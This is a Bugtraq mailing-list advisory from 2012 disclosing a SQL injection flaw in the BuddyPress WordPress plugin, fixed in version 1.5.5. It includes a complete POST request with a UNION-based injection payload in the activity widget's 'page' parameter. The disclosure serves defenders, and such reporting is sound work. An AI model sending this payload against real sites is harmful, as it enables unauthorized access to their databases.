[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: SQL injection in Wordpress plugin Buddypress
From: ivan_terkin () yahoo ! com
Date: 2012-03-31 17:27:57
Message-ID: 201203311727.q2VHRvwx027211 () sf01web1 ! securityfocus ! com
[Download RAW message or body]
Hi,
I would like disclosure SQL injection vulnerability if Buddypress plugin affecting \
last versions. This issue was reported to developers and resolved in 1.5.5 version. \
So, I suggest all having this plugin in their blogs update to last version, if you \
haven't done it yet. Example of POST message with sql injection is below.
POST /wp-load.php HTTP/1.1
User-Agent: Mozilla
Host: example.com
Accept: */*
Referer: http://example.com/activity/?s=b
Connection: Keep-Alive
Content-Length: 153
Content-Type: application/x-www-form-urlencoded
action=activity_widget_filter&page=1%26exclude%3d1)and(1=0)UNION(SELECT(1),(2),(3),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17))%3b--+
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic